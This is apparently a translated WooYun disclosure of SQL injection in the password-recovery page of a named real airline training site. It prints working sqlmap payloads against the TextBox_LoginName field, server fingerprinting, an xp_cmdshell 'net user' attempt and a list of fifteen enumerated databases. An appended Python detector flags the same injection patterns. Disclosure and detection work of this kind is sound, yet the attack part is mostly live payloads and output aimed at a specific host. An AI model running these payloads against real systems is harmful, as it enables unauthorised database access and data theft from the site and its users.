Vulnerability summary

Defect ID: wooyun-2014-079982

Title: SQL injection vulnerability on an HNA site

Vendor: hnagroup.com

Author: 紫霞仙子

Submitted: 2014-10-20 17:25

Fix time: 2014-10-25 17:26

Published: 2014-10-25 17:26

Vulnerability type: SQL injection

Severity: Medium

Self-assessed rank: 10

Status: vendor notified, but the vendor ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2014-10-20: Details sent to the vendor, awaiting vendor action
2014-10-25: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

It's a training site, but the database is still fairly large.

Detailed description:

http://www.ltt-hna.com/Index/PasswordBack.aspx

[Screenshot: QQ图片20141019140235.png]


POST data:
"BtnOne=%e4%b8%8b%e4%b8%80%e6%ad%a5&hidpassword=&TextBox_LoginName=name123&__EVENTARGUMENT=&__EVENTTARGET=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUKMTk5MDc0NzM2MA9kFgICAw9kFgICDw9kFgICCQ8PZBYCHgdvbmNsaWNrBQhPdXRwdXQoKWRk6RIAgnGNMy%2bIm%2bjQs2uzX8zqEyI%3d&__VIEWSTATEGENERATOR=8F891C3C"
Parameter: TextBox_LoginName

Proof of vulnerability:

---
Place: POST
Parameter: TextBox_LoginName
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: BtnOne=%e4%b8%8b%e4%b8%80%e6%ad%a5&hidpassword=&TextBox_LoginName=bcJsQZgQ' UNION ALL SELECT NULL,CHAR(113)+CHAR(115)+CHAR(108)+CHAR(103)+CHAR(113)+CHAR(102)+CHAR(114)+CHAR(85)+CHAR(108)+CHAR(80)+CHAR(111)+CHAR(104)+CHAR(66)+CHAR(80)+CHAR(79)+CHAR(113)+CHAR(105)+CHAR(114)+CHAR(115)+CHAR(113),NULL,NULL-- &__EVENTARGUMENT=&__EVENTTARGET=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUKMTk5MDc0NzM2MA9kFgICAw9kFgICDw9kFgICCQ8PZBYCHgdvbmNsaWNrBQhPdXRwdXQoKWRk6RIAgnGNMy+Im+jQs2uzX8zqEyI=&__VIEWSTATEGENERATOR=8F891C3C
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: BtnOne=%e4%b8%8b%e4%b8%80%e6%ad%a5&hidpassword=&TextBox_LoginName=bcJsQZgQ'; WAITFOR DELAY '0:0:5'--&__EVENTARGUMENT=&__EVENTTARGET=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUKMTk5MDc0NzM2MA9kFgICAw9kFgICDw9kFgICCQ8PZBYCHgdvbmNsaWNrBQhPdXRwdXQoKWRk6RIAgnGNMy+Im+jQs2uzX8zqEyI=&__VIEWSTATEGENERATOR=8F891C3C
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: BtnOne=%e4%b8%8b%e4%b8%80%e6%ad%a5&hidpassword=&TextBox_LoginName=bcJsQZgQ' WAITFOR DELAY '0:0:5'--&__EVENTARGUMENT=&__EVENTTARGET=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUKMTk5MDc0NzM2MA9kFgICAw9kFgICDw9kFgICCQ8PZBYCHgdvbmNsaWNrBQhPdXRwdXQoKWRk6RIAgnGNMy+Im+jQs2uzX8zqEyI=&__VIEWSTATEGENERATOR=8F891C3C
---
[INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[ERROR] unable to retrieve xp_cmdshell output // a cmdshell with no output echoed back...
os-shell> net user
--------------------
available databases [15]:
[*] Ameco_App
[*] AmecoIII
[*] AMTMSys
[*] ASPState
[*] EGBeLMS5
[*] HaiHangTM_BugTracker
[*] master
[*] model
[*] msdb
[*] NewQhope01
[*] qhopecmsegb
[*] TeacherGarden
[*] TeacherLicense
[*] tempdb
[*] UtiTech
Database: EGBeLMS5
[171 tables]

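As an added detection example (not part of the report), the Python below decodes a POST body the way the server would and flags the three injection techniques sqlmap reported against TextBox_LoginName, also reversing sqlmap's CHAR()-concatenated marker strings; the request bodies are constructed and the __VIEWSTATE values are placeholders.

```python
import re
from urllib.parse import parse_qs

# Constructed request bodies modelled on the report's payloads, as they would
# appear on the wire: spaces as %20, '+' as %2b (a bare '+' in a form body
# decodes to a space), ';' as %3B. __VIEWSTATE is a placeholder, not the real one.
_TAIL = "&__EVENTTARGET=&__VIEWSTATE=VIEWSTATE_PLACEHOLDER&__VIEWSTATEGENERATOR=8F891C3C"
SAMPLES = {
    "benign": "BtnOne=%e4%b8%8b%e4%b8%80%e6%ad%a5&hidpassword=&TextBox_LoginName=name123" + _TAIL,
    "union": "BtnOne=x&hidpassword=&TextBox_LoginName=bcJsQZgQ'%20UNION%20ALL%20SELECT%20NULL,"
             "CHAR(113)%2bCHAR(115)%2bCHAR(108)%2bCHAR(103)%2bCHAR(113),NULL,NULL--%20" + _TAIL,
    "stacked": "BtnOne=x&hidpassword=&TextBox_LoginName=bcJsQZgQ'%3B%20WAITFOR%20DELAY%20'0:0:5'--" + _TAIL,
    "time_blind": "BtnOne=x&hidpassword=&TextBox_LoginName=bcJsQZgQ'%20WAITFOR%20DELAY%20'0:0:5'--" + _TAIL,
}

# Indicators for the three techniques in the sqlmap output (T-SQL syntax).
SQLI_PATTERNS = {
    "union_select": re.compile(r"'\s*union\s+(?:all\s+)?select\b", re.I),
    "time_delay": re.compile(r"\bwaitfor\s+delay\b", re.I),
    "stacked_query": re.compile(r"'\s*;"),
}
CHAR_CONCAT = re.compile(r"(?:CHAR\(\d+\)\+)+CHAR\(\d+\)", re.I)


def decode_char_concat(expr: str) -> str:
    """Turn CHAR(113)+CHAR(115)+... back into the literal it builds."""
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", expr, re.I))


def inspect_body(body: str, field: str = "TextBox_LoginName") -> list:
    """Decode a POST body and report SQLi indicators found in one form field."""
    findings = []
    for value in parse_qs(body, keep_blank_values=True).get(field, []):
        indicators = [name for name, pat in SQLI_PATTERNS.items() if pat.search(value)]
        decoded = [decode_char_concat(m.group(0)) for m in CHAR_CONCAT.finditer(value)]
        if indicators or decoded:
            findings.append({"field": field, "indicators": indicators,
                             "decoded_strings": decoded, "value": value})
    return findings


if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, inspect_body(body))
```

The decoded marker (here "qslgq") is the q...q delimiter sqlmap wraps around extracted data, so seeing such a string in a request or an error page is a strong sign of automated extraction rather than a typo in a user name.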
Fix recommendation:

This...

Copyright notice: please credit the source when reposting: 紫霞仙子@乌云


Vulnerability response

Vendor response:

Severity: No impact, ignored by the vendor

Ignored on: 2014-10-25 17:26

Vendor reply:

Latest status:

None